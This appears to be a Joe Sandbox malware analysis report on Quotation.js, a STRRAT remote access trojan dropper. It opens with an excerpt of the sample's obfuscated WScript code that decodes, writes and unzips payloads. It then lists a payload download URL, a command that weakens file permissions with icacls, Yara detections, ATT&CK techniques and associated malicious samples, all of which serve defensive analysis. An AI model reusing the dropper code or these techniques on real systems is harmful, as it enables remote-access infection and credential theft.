CklqdFL[33]);kYfpnX_qCl[CklqdFL[59]](CklqdFL[18] + izPTBQ_jTC + CklqdFL[30] + CklqdFL[18] + JlhwENqfnl + CklqdFL[18]);}function decodeBase64(base64){var DM = WScript[CklqdFL[47]](CklqdFL[38]);var EL = DM[CklqdFL[73]](CklqdFL[39]);EL[CklqdFL[74]] = CklqdFL[40];EL[CklqdFL[75]] = base64;return EL[CklqdFL[76]];}function writeBytes(file, bytes){var ChoQAUCA_b = WScript[CklqdFL[47]](CklqdFL[41]);ChoQAUCA_b[CklqdFL[65]] = 1;ChoQAUCA_b[CklqdFL[79]]();ChoQAUCA_b[CklqdFL[80]](bytes);ChoQAUCA_b[CklqdFL[81]](file, 2);}function UnZip(zipfile, ExtractTo){if(PajvHKk$Px[CklqdFL[82]](zipfile) == CklqdFL[42]){if(!PajvHKk$Px[CklqdFL[83]](ExtractTo)){PajvHKk$Px[CklqdFL[84]](ExtractTo);}var ILFMGamxnA = WScript[CklqdFL[47]](CklqdFL[43]);var KPDuuaFk_S = ILFMGamxnA[CklqdFL[86]](ExtractTo);var kO_atSzV$m = ILFMGamxnA[CklqdFL[86]](zipfile)[CklqdFL[88]]();for(i = 0; i < kO_atSzV$m[CklqdFL[89]]; i++){if(PajvHKk$Px[CklqdFL[90]](PajvHKk$Px[CklqdFL[91]](ExtractTo,kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[93]])+CklqdFL[44]+PajvHKk$Px[CklqdFL[94]](kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[96]]))){PajvHKk$Px[CklqdFL[97]](PajvHKk$Px[CklqdFL[91]](ExtractTo,kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[93]])+CklqdFL[44]+PajvHKk$Px[CklqdFL[94]](kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[96]]));}KPDuuaFk_S[CklqdFL[104]](kO_atSzV$m[CklqdFL[92]](i), 20);}}}IHost.CreateObject("adodb.stream");IHost.CreateObj

Yara detected AllatoriJARObfuscator

Source: Yara match	File source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAD8F7 push 00000000h; mov dword ptr [esp], esp	1_2_02EAD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAA20A push ecx; ret	1_2_02EAA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAA21B push ecx; ret	1_2_02EAA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAB3B7 push 00000000h; mov dword ptr [esp], esp	1_2_02EAB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EABB67 push 00000000h; mov dword ptr [esp], esp	1_2_02EABB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAD8D1 push 00000000h; mov dword ptr [esp], esp	1_2_02EAD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAB947 push 00000000h; mov dword ptr [esp], esp	1_2_02EAB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02EAC477 push 00000000h; mov dword ptr [esp], esp	1_2_02EAC49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_02F49091 push cs; retf	1_2_02F490B1

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2980713081.0000000001488000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.2980713081.0000000001488000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.2980713081.0000000001488000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Memory protected: page read and write | page guard

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"			Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M			Jump to behavior

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_02EA03C0 cpuid

1_2_02EA03C0

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion			Jump to behavior

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7588 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\3608lock.file VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected STRRAT

Source: Yara match	File source: 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Yara detected STRRAT

Source: Yara match	File source: 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	Windows Management Instrumentation	12 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 Disable or Modify Tools	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	Security Account Manager	32 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Services File Permissions Weakness	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation.js	18%	ReversingLabs	Script-JS.Trojan.Heuristic

Source	Detection	Scanner	Label	Link
http://wshsoft.company/jv/jrex.zipnf	0%	Avira URL Cloud	safe
https://repo1.mave	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	20.233.83.145	true	false	high
dualstack.sonatype.map.fastly.net	199.232.192.209	true	false	high
repo1.maven.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.xrampsecurity.com/XGCA.crl	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar	javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repo1.mave	javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com	javaw.exe, 00000001.00000002.2981310516.000000000508C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005159000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repository.luxtrust.lu0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bugreport.sun.com/bugreport/	javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html0	javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
http://java.oracle.com/	javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://null.oracle.com/	javaw.exe, 00000001.00000002.2988463931.0000000015B9A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936252909.0000000015B7B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1774418678.0000000015B72000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936715902.0000000015B93000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.chambersign.org1	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.swisssign.com/0	javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar	javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989008162.0000000016059000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989078586.00000000160EA000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2980872495.0000000001668000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2988964468.0000000015FC8000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989156025.0000000016179000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	false		high
http://policy.camerfirma.com	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar	javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crl0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadisglobal.com/cps	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crl	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repo1.maven.org	javaw.exe, 00000001.00000002.2981310516.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005381000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005136000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000518C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000051B1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repository.luxtrust.lu	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://wshsoft.company/jv/jrex.zipnf	wscript.exe, 00000000.00000003.1721139336.00000252C4DF9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadisglobal.com/cps0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarar	javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadis.bm	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://wshsoft.company/jv/jrex.zip	wscript.exe, 00000000.00000003.1710702029.00000252C3038000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com0	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.allatori.com	javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.chambersign.org/chambersroot.crl	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.swisssign.com/	javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.chambersign.org	javaw.exe, 00000001.00000002.2982954889.000000000A992000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar	javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	false		high
http://policy.camerfirma.com0	javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.232.192.209	dualstack.sonatype.map.fastly.net	United States		54113	FASTLYUS	false
20.233.83.145	github.com	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562892
Start date and time:	2024-11-26 09:02:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation.js
Detection:	MAL
Classification:	mal92.troj.evad.winJS@6/4@5/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 69% Number of executed functions: 13 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target javaw.exe, PID 7588 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Quotation.js

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
199.232.192.209	RFQ AE 3003910999.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse
	Bestellung EB0072813.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse
	kIMPADTn5g.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse
	YPcqnc0z06.js	Get hash	malicious	STRRAT	Browse
	Proof of payment.js	Get hash	malicious	STRRAT	Browse
	Tax Returns Of R38,765.js	Get hash	malicious	STRRAT	Browse
	Tax Returns Of R38,765.js	Get hash	malicious	STRRAT	Browse
	8NR95Z54o9.js	Get hash	malicious	STRRAT	Browse
20.233.83.145	xeno.bat	Get hash	malicious	Unknown	Browse
	RFQ AE 3003910999.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse
	Bestellung EB0072813.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse
	y.bat	Get hash	malicious	Braodo	Browse
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse
	https://linkchainsfix.vercel.app/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dualstack.sonatype.map.fastly.net	RFQ AE 3003910999.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209
	Bestellung EB0072813.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209
	kIMPADTn5g.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse	199.232.192.209
	LYDI9MoZyu.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	YPcqnc0z06.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	LYDI9MoZyu.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	Proof of payment.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
github.com	xeno.bat	Get hash	malicious	Unknown	Browse	20.233.83.145
	RFQ AE 3003910999.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	20.233.83.145
	Bestellung EB0072813.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	20.233.83.145
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	20.233.83.145
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	20.233.83.145
	y.bat	Get hash	malicious	Braodo	Browse	20.233.83.145
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	20.233.83.145
	https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	kIMPADTn5g.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	INVITATION TO BID as on 25 NOV 2024.html	Get hash	malicious	HTMLPhisher	Browse	185.199.108.153
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	Finish_Agreement_DocuSign.pdf	Get hash	malicious	Unknown	Browse	151.101.66.137
	http://www.btc1yby.blogspot.rs/	Get hash	malicious	GRQ Scam	Browse	151.101.66.208
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
MICROSOFT-CORP-MSN-AS-BLOCKUS	9oKqST-uPDy7iigkXM-C5J2.eml	Get hash	malicious	Unknown	Browse	52.113.195.132
	jlPBMMQbXC.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.136.10
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	204.79.197.203
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.101.168.44
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.75.60.91
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	FW Expiration Pending Support Care HIPAA Acknowledgement Form 2024.eml	Get hash	malicious	Unknown	Browse	52.109.76.243
	https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=true	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	13.107.246.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
026e5ca865ce1f09da3a81d8a4e3effb	RFQ AE 3003910999.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209 20.233.83.145
	Bestellung EB0072813.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209 20.233.83.145
	kIMPADTn5g.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209 20.233.83.145
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse	199.232.192.209 20.233.83.145
	SWIFT-MT103-17112024.js	Get hash	malicious	STRRAT	Browse	199.232.192.209 20.233.83.145
	LYDI9MoZyu.js	Get hash	malicious	STRRAT	Browse	199.232.192.209 20.233.83.145
	YPcqnc0z06.js	Get hash	malicious	STRRAT	Browse	199.232.192.209 20.233.83.145
	LYDI9MoZyu.js	Get hash	malicious	STRRAT	Browse	199.232.192.209 20.233.83.145
	Proof of payment.js	Get hash	malicious	STRRAT	Browse	199.232.192.209 20.233.83.145

Process:	C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.842186055004734
Encrypted:	false
SSDEEP:	3:oFj4I5vpm4USeLn:oJ5beL
MD5:	FB3536DCC7B1CB4E1A0AECB1E56FBD50
SHA1:	202FAF2E95005972CACFB1FD215F25352F6A9091
SHA-256:	925E26329A53200531B86FD667EFEDD0692FD3C324CE941E71E968D6765687D5
SHA-512:	B3DD47C2415E01D8A41AD563BBD02997E3B9B457FBCDB0579BB6DFFEDAB3EBA9057FA58AB1CD9CF417A4F382259D35B5C86FB2108FCBB60E482A5BC764C61C14
Malicious:	false
Reputation:	low
Preview:	C:\Program Files (x86)\Java\jre-1.8..1732608209808..

C:\Users\user\AppData\Local\Temp\hsperfdata_user\7588
